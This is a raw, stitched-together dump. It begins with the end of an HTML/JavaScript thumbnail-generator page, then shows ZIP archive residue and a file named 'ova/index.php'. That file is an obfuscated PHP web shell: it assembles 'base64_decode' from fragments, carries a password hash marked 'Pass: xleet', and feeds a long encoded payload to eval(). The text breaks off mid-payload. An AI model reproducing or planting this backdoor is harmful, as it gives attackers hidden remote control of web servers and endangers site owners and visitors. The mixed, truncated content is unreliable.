-textHeight/2 - padding, textWidth + 2*padding, textHeight + 2*padding); } context.restore(); } elements.loadingSpinner.style.display = 'none'; callback(); }; if (state.currentImage) { loadImage(state.currentImage) .then(img => drawOverlayAndText(img)) .catch(err => { elements.errorContainer.textContent = err.message; drawOverlayAndText(); }); } else { drawOverlayAndText(); } } // Draw thumbnail function drawThumbnail() { requestAnimationFrame(() => { drawOnCanvas(offscreenCtx, offscreenCanvas.width, offscreenCanvas.height, true, () => { ctx.clearRect(0, 0, canvasWidth, canvasHeight); ctx.drawImage(offscreenCanvas, 0, 0); }); }); } // Apply template function applyTemplate(template) { switch(template) { case 'red-dark': state.textObjects.main.color = '#ff0000'; state.textObjects.secondary.color = '#ffffff'; state.bgColor = '#000000'; state.overlayColor = '#8b0000'; state.overlayOpacity = 0.4; break; case 'green-dark': state.textObjects.main.color = '#00ff00'; state.textObjects.secondary.color = '#ffffff'; state.bgColor = '#000000'; state.overlayColor = '#003300'; state.overlayOpacity = 0.4; break; case 'blue-dark': state.textObjects.main.color = '#00ffff'; state.textObjects.secondary.color = '#ffffff'; state.bgColor = '#000000'; state.overlayColor = '#00008b'; state.overlayOpacity = 0.4; break; case 'orange-dark': state.textObjects.main.color = '#ff9900'; state.textObjects.secondary.color = '#ffffff'; state.bgColor = '#000000'; state.overlayColor = '#663300'; state.overlayOpacity = 0.4; break; case 'pink-dark': state.textObjects.main.color = '#ff00ff'; state.textObjects.secondary.color = '#ffffff'; state.bgColor = '#000000'; state.overlayColor = '#660066'; state.overlayOpacity = 0.4; break; } elements.mainTextColorInput.value = state.textObjects.main.color; elements.secondaryTextColorInput.value = state.textObjects.secondary.color; elements.bgColorInput.value = state.bgColor; elements.overlayColorInput.value = state.overlayColor; elements.overlayOpacityInput.value = state.overlayOpacity; elements.overlayOpacityValue.textContent = state.overlayOpacity; saveHistory(); drawThumbnail(); } // Set text position window.setTextPosition = function(key, position) { const text = state.textObjects[key]; const metrics = offscreenCtx.measureText(text.text); const textWidth = metrics.width; const textHeight = text.fontSize; const padding = 20; switch(position) { case 'top-left': text.x = textWidth / 2 + padding; text.y = textHeight / 2 + padding; break; case 'center': text.x = canvasWidth / 2; text.y = canvasHeight / 2 + (key === 'main' ? -50 : 50); break; case 'bottom-right': text.x = canvasWidth - textWidth / 2 - padding; text.y = canvasHeight - textHeight / 2 - padding; break; } saveHistory(); drawThumbnail(); }; // Unsplash search function searchUnsplash(page = 1, append = false) { const query = elements.unsplashSearchInput.value.trim(); if (!query) { elements.errorContainer.textContent = 'Please enter a search query.'; elements.loadMoreBtn.style.display = 'none'; elements.retryBtn.style.display = 'none'; return; } if (UNSPLASH_ACCESS_KEY === 'YOUR_UNSPLASH_ACCESS_KEY') { elements.errorContainer.textContent = 'Please replace YOUR_UNSPLASH_ACCESS_KEY with your Unsplash API key.'; elements.loadMoreBtn.style.display = 'none'; elements.retryBtn.style.display = 'none'; return; } state.unsplashQuery = query; state.unsplashPage = page; elements.loadingSpinner.style.display = 'block'; elements.loadMoreBtn.style.display = 'none'; elements.retryBtn.style.display = 'none'; if (!append) { elements.unsplashResults.innerHTML = ''; } fetch(`https://api.unsplash.com/search/photos?query=${encodeURIComponent(query)}&page=${page}&per_page=20&client_id=${UNSPLASH_ACCESS_KEY}`, { mode: 'cors', headers: { 'Accept': 'application/json' } }) .then(response => { if (!response.ok) { if (response.status === 403) { throw new Error('Unsplash API key is invalid or rate limit exceeded.'); } else if (response.status === 429) { throw new Error('Unsplash API rate limit exceeded. Try again later.'); } else { throw new Error(`HTTP error! Status: ${response.status}`); } } return response.json(); }) .then(data => { elements.loadingSpinner.style.display = 'none'; if (data.results && data.results.length > 0) { data.results.forEach(photo => { const img = document.createElement('img'); img.src = photo.urls.regular; img.alt = photo.alt_description || 'Unsplash image'; img.crossOrigin = 'anonymous'; img.style.opacity = 0; img.onload = () => { img.style.opacity = 1; }; img.onerror = () => { img.style.display = 'none'; }; img.onclick = () => { state.currentImage = { type: 'url', value: `${photo.urls.regular}&w=1280&h=720&fit=crop&auto=format` }; elements.unsplashResults.querySelectorAll('img').forEach(i => i.classList.remove('selected')); img.classList.add('selected'); saveHistory(); drawThumbnail(); }; elements.unsplashResults.appendChild(img); }); elements.loadMoreBtn.style.display = 'block'; elements.errorContainer.textContent = ''; } else { elements.errorContainer.textContent = 'No results found on Unsplash for this query.'; elements.loadMoreBtn.style.display = 'none'; } }) .catch(err => { elements.loadingSpinner.style.display = 'none'; elements.errorContainer.textContent = err.message || 'Failed to search Unsplash. Check your API key or internet connection.'; elements.retryBtn.style.display = 'block'; elements.loadMoreBtn.style.display = 'none'; console.error('Unsplash Error:', err); }); } // Event listeners function initEventListeners() { elements.mainTextInput.addEventListener('input', () => { state.textObjects.main.text = elements.mainTextInput.value; saveHistory(); drawThumbnail(); }); elements.mainTextColorInput.addEventListener('input', () => { state.textObjects.main.color = elements.mainTextColorInput.value; saveHistory(); drawThumbnail(); }); elements.mainTextStyleInput.addEventListener('change', () => { state.textObjects.main.style = elements.mainTextStyleInput.value; saveHistory(); drawThumbnail(); }); elements.mainTextSizeInput.addEventListener('input', () => { state.textObjects.main.fontSize = parseInt(elements.mainTextSizeInput.value); elements.mainTextSizeValue.textContent = state.textObjects.main.fontSize; saveHistory(); drawThumbnail(); }); elements.mainTextRotationInput.addEventListener('input', () => { state.textObjects.main.rotation = parseInt(elements.mainTextRotationInput.value) * Math.PI / 180; elements.mainTextRotationValue.textContent = elements.mainTextRotationInput.value; saveHistory(); drawThumbnail(); }); elements.mainTextBoldInput.addEventListener('input', () => { state.textObjects.main.bold = parseInt(elements.mainTextBoldInput.value); elements.mainTextBoldValue.textContent = state.textObjects.main.bold; saveHistory(); drawThumbnail(); }); elements.mainTextNeonInput.addEventListener('input', () => { state.textObjects.main.neon = parseInt(elements.mainTextNeonInput.value); elements.mainTextNeonValue.textContent = state.textObjects.main.neon; saveHistory(); drawThumbnail(); }); elements.mainTextStrokeInput.addEventListener('input', () => { state.textObjects.main.stroke = parseInt(elements.mainTextStrokeInput.value); elements.mainTextStrokeValue.textContent = state.textObjects.main.stroke; saveHistory(); drawThumbnail(); }); elements.mainTextShadowColorInput.addEventListener('input', () => { state.textObjects.main.shadowColor = elements.mainTextShadowColorInput.value; saveHistory(); drawThumbnail(); }); elements.secondaryTextInput.addEventListener('input', () => { state.textObjects.secondary.text = elements.secondaryTextInput.value; saveHistory(); drawThumbnail(); }); elements.secondaryTextColorInput.addEventListener('input', () => { state.textObjects.secondary.color = elements.secondaryTextColorInput.value; saveHistory(); drawThumbnail(); }); elements.secondaryTextStyleInput.addEventListener('change', () => { state.textObjects.secondary.style = elements.secondaryTextStyleInput.value; saveHistory(); drawThumbnail(); }); elements.secondaryTextSizeInput.addEventListener('input', () => { state.textObjects.secondary.fontSize = parseInt(elements.secondaryTextSizeInput.value); elements.secondaryTextSizeValue.textContent = state.textObjects.secondary.fontSize; saveHistory(); drawThumbnail(); }); elements.secondaryTextRotationInput.addEventListener('input', () => { state.textObjects.secondary.rotation = parseInt(elements.secondaryTextRotationInput.value) * Math.PI / 180; elements.secondaryTextRotationValue.textContent = elements.secondaryTextRotationInput.value; saveHistory(); drawThumbnail(); }); elements.secondaryTextBoldInput.addEventListener('input', () => { state.textObjects.secondary.bold = parseInt(elements.secondaryTextBoldInput.value); elements.secondaryTextBoldValue.textContent = state.textObjects.secondary.bold; saveHistory(); drawThumbnail(); }); elements.secondaryTextNeonInput.addEventListener('input', () => { state.textObjects.secondary.neon = parseInt(elements.secondaryTextNeonInput.value); elements.secondaryTextNeonValue.textContent = state.textObjects.secondary.neon; saveHistory(); drawThumbnail(); }); elements.secondaryTextStrokeInput.addEventListener('input', () => { state.textObjects.secondary.stroke = parseInt(elements.secondaryTextStrokeInput.value); elements.secondaryTextStrokeValue.textContent = state.textObjects.secondary.stroke; saveHistory(); drawThumbnail(); }); elements.secondaryTextShadowColorInput.addEventListener('input', () => { state.textObjects.secondary.shadowColor = elements.secondaryTextShadowColorInput.value; saveHistory(); drawThumbnail(); }); elements.bgColorInput.addEventListener('input', () => { state.bgColor = elements.bgColorInput.value; saveHistory(); drawThumbnail(); }); elements.overlayColorInput.addEventListener('input', () => { state.overlayColor = elements.overlayColorInput.value; saveHistory(); drawThumbnail(); }); elements.overlayOpacityInput.addEventListener('input', () => { state.overlayOpacity = parseFloat(elements.overlayOpacityInput.value); elements.overlayOpacityValue.textContent = state.overlayOpacity; saveHistory(); drawThumbnail(); }); elements.canvasZoomInput.addEventListener('input', () => { state.zoom = parseFloat(elements.canvasZoomInput.value); elements.canvasZoomValue.textContent = state.zoom + 'x'; updateCanvasSize(); saveHistory(); drawThumbnail(); }); elements.bgImageFileInput.addEventListener('change', () => { elements.errorContainer.textContent = ''; if (elements.bgImageFileInput.files && elements.bgImageFileInput.files[0]) { const reader = new FileReader(); reader.onload = function(e) { state.currentImage = { type: 'data', value: e.target.result }; elements.unsplashResults.innerHTML = ''; saveHistory(); drawThumbnail(); }; reader.onerror = () => { elements.errorContainer.textContent = 'Failed to read local image file.'; }; reader.readAsDataURL(elements.bgImageFileInput.files[0]); } }); elements.searchUnsplashBtn.addEventListener('click', () => searchUnsplash(1)); elements.loadMoreBtn.addEventListener('click', () => searchUnsplash(state.unsplashPage + 1, true)); elements.retryBtn.addEventListener('click', () => searchUnsplash(state.unsplashPage)); elements.generateBtn.addEventListener('click', drawThumbnail); elements.downloadBtn.addEventListener('click', () => { const tempCanvas = document.createElement('canvas'); tempCanvas.width = canvasWidth; tempCanvas.height = canvasHeight; const tempCtx = tempCanvas.getContext('2d'); drawOnCanvas(tempCtx, canvasWidth, canvasHeight, false, () => { const link = document.createElement('a'); link.download = 'gaming-thumbnail.png'; link.href = tempCanvas.toDataURL('image/png'); document.body.appendChild(link); link.click(); document.body.removeChild(link); }); }); elements.undoBtn.addEventListener('click', undo); elements.redoBtn.addEventListener('click', redo); elements.templates.forEach(template => { template.addEventListener('click', () => { elements.templates.forEach(t => t.classList.remove('active')); template.classList.add('active'); applyTemplate(template.getAttribute('data-template')); }); }); // Mouse events elements.canvas.addEventListener('mousemove', e => handleMove(e, 'mouse')); elements.canvas.addEventListener('mousedown', e => handleDown(e, 'mouse')); elements.canvas.addEventListener('mouseup', () => handleUp()); elements.canvas.addEventListener('mouseleave', handleUp); // Touch events elements.canvas.addEventListener('touchstart', e => handleDown(e, 'touch'), { passive: false }); elements.canvas.addEventListener('touchmove', e => handleMove(e, 'touch'), { passive: false }); elements.canvas.addEventListener('touchend', handleUp); // Handle drag function handleDown(e, type) { const rect = elements.canvas.getBoundingClientRect(); const x = (type === 'mouse' ? e.clientX : e.touches[0].clientX) - rect.left; const y = (type === 'mouse' ? e.clientY : e.touches[0].clientY) - rect.top; const canvasX = x * (canvasWidth / rect.width) / state.zoom; const canvasY = y * (canvasHeight / rect.height) / state.zoom; activeText = null; for (const key in state.textObjects) { const text = state.textObjects[key]; offscreenCtx.font = `${text.bold} ${text.fontSize}px Impact, sans-serif`; const metrics = offscreenCtx.measureText(text.text); const textWidth = metrics.width; const textHeight = text.fontSize; const padding = 20; const cos = Math.cos(-text.rotation); const sin = Math.sin(-text.rotation); const localX = (canvasX - text.x) * cos - (canvasY - text.y) * sin; const localY = (canvasX - text.x) * sin + (canvasY - text.y) * cos; if (localX > -textWidth/2 - padding && localX < textWidth/2 + padding && localY > -textHeight/2 - padding && localY < textHeight/2 + padding) { activeText = key; elements.canvas.style.cursor = 'move'; isDragging = true; lastX = x; lastY = y; if (type === 'touch') e.preventDefault(); break; } } if (!activeText) { elements.canvas.style.cursor = 'default'; } drawThumbnail(); } function handleMove(e, type) { const rect = elements.canvas.getBoundingClientRect(); const x = (type === 'mouse' ? e.clientX : e.touches[0].clientX) - rect.left; const y = (type === 'mouse' ? e.clientY : e.touches[0].clientY) - rect.top; const canvasX = x * (canvasWidth / rect.width) / state.zoom; const canvasY = y * (canvasHeight / rect.height) / state.zoom; if (isDragging && activeText) { const dx = (x - lastX) * (canvasWidth / rect.width) / state.zoom; const dy = (y - lastY) * (canvasHeight / rect.height) / state.zoom; state.textObjects[activeText].x += dx; state.textObjects[activeText].y += dy; lastX = x; lastY = y; saveHistory(); drawThumbnail(); if (type === 'touch') e.preventDefault(); } else { let cursor = 'default'; for (const key in state.textObjects) { const text = state.textObjects[key]; offscreenCtx.font = `${text.bold} ${text.fontSize}px Impact, sans-serif`; const metrics = offscreenCtx.measureText(text.text); const textWidth = metrics.width; const textHeight = text.fontSize; const padding = 20; const cos = Math.cos(-text.rotation); const sin = Math.sin(-text.rotation); const localX = (canvasX - text.x) * cos - (canvasY - text.y) * sin; const localY = (canvasX - text.x) * sin + (canvasY - text.y) * cos; if (localX > -textWidth/2 - padding && localX < textWidth/2 + padding && localY > -textHeight/2 - padding && localY < textHeight/2 + padding) { cursor = 'move'; activeText = key; break; } } elements.canvas.style.cursor = cursor; drawThumbnail(); } } function handleUp() { isDragging = false; activeText = null; elements.canvas.style.cursor = 'default'; drawThumbnail(); } // Menu toggle document.querySelector('.menu-icon').addEventListener('click', () => { document.querySelector('nav ul').classList.toggle('show'); }); } // Initialize document.addEventListener('DOMContentLoaded', () => { loadState(); initCanvas(); initEventListeners(); drawThumbnail(); }); })(); </script> </body> </html>PK r�*[kr;� ova/index.phpnu �[��� <?php $▛ = "59e8d97dbcc1d0f65dea6ecd0e9fbe39"; //Pass: xleet $o= "ba"."se"."\x36\x34\x5F"."de"."c"."ode"; eval($o("
$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqe\x61m\x63Snp\x43\x62np6RqFJ\x63UF\x61WW\x61\x61gUl5QY\x61IK\x42NQ\x41\x3d";
$stt0 = "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